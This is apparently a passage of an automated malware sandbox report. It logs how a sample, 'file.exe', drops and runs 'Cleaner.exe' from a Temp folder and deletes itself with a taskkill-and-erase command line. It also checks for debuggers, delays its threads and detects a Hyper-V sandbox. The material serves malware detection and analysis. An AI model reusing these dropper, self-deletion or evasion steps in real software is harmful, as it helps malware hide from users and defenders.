                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\file.exe TID: 5364Thread sleep count: 34 > 30
                  Source: C:\Users\user\Desktop\file.exe TID: 5436Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Bunifu_UI_v1.5.3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\dll[1]Jump to dropped file
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 60000
                  Source: file.exe, 00000000.00000000.451291372.0000000003012000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW<
                  Source: file.exe, 00000000.00000000.450973724.00000000009A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWXr
                  Source: file.exe, 00000000.00000000.451291372.0000000003012000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: file.exe, 00000000.00000000.444182546.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000000.436870708.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000018.00000000.584076349.0000014375AFB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeMemory allocated: page read and write | page guard
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe "C:\Users\user~1\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe"
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2380 -s 1576
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "file.exe" /f
                  Source: file.exe, 00000000.00000000.404907524.000000000250E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.422719075.000000000250E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: file.exe, 00000000.00000000.404907524.000000000250E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.422719075.000000000250E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: program manager
                  Source: file.exe, 00000000.00000000.404907524.000000000250E000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000000.422719075.000000000250E000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: F.program manager
                  Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Bunifu_UI_v1.5.3.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
